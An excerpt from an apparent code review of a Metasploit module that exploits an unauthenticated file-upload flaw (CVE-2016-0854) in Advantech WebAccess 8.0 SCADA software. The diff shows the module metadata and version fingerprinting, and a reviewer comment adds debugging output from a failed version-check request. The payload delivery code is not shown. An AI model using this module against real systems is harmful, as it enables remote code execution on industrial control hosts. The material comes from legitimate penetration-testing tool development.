modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb

```diff
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
+      'Description'    => %q{
+         This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
+         This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
+         of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
+         The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
+         the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
+         upload arbitrary code (instead of an image) to the server, which will then be executed under the
+         high-privilege context of the IIS AppPool.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'rgod', # Vulnerability discovery
+        'Zhou Yu <504137480[at]qq.com>' # MSF module
+      ],
+      'References'     => [
+        [ 'CVE', '2016-0854' ],
+        [ 'ZDI', '16-128' ],
+        [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
+      ],
+      'Platform'      => 'win',
+      'Targets'       => [
+        ['Advantech WebAccess 8.0', {}]
+      ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Feb 5 2016",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/'])
+      ], self.class)
+  end
+
+  def version_match(data)
+    # Software Build : 8.0-2015.08.15
+    fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
+    fingerprint['version'] unless fingerprint.nil?
+  end
+
+  def vuln_version?
+    res = send_request_cgi(
```

Comment:
@wchen-r7 We will let http request redirect to ```GET ./broadWeb/bwRoot.asp```  with ```#send_request_cgi!```. Please see the following debug messages:

```

    56: def vuln_version?
    57:   res = send_request_cgi!(
    58:     'method'   => 'GET',
    59:     'uri'      => normalize_uri(target_uri.path)
    60:   )
    61: 
    62:   ver = version_match(res.body) ? res : nil
    63:   require 'pry'
 => 64:   binding.pry
    65:   true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
    66: end

[1] pry(#<Msf::Modules::Mod6578706c6f69742f77696e646f77732f73636164612f616476616e746563685f7765626163636573735f64617368626f6172645f66696c655f75706c6f6164::MetasploitModule>)> ver
=> nil
[2] pry(#<Msf::Modules::Mod6578706c6f69742f77696e646f77732f73636164612f616476616e746563685f7765626163636573735f64617368626f6172645f66696c655f75706c6f6164::MetasploitModule>)> res.code
=> 400
[3] pry(#<Msf::Modules::Mod6578706c6f69742f77696e646f77732f73636164612f616476616e746563685f7765626163636573735f64617368626f6172645f66696c655f75706c6f6164::MetasploitModule>)> res.body
=> "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\">\r\n<HTML><HEAD><TITLE>Bad Request</TITLE>\r\n<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD>\r\n<BODY><h2>Bad Request - Invalid URL</h2>\r\n<hr><p>HTTP Error 400. The request URL is invalid.</p>\r\n</BODY></HTML>\r\n"
[4] pry(#<Msf::Modules::Mod6578706c6f69742f77696e646f77732f73636164612f616476616e746563685f7765626163636573735f64617368626f6172645f66696c655f75706c6f6164::MetasploitModule>)> res.request
=> "GET ./broadWeb/bwRoot.asp HTTP/1.1\r\nHost: \r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
[5] pry(#<Msf::Modules::Mod6578706c6f69742f77696e646f77732f73636164612f616476616e746563685f7765626163636573735f64617368626f6172645f66696c655f75706c6f6164::MetasploitModule>)> 
```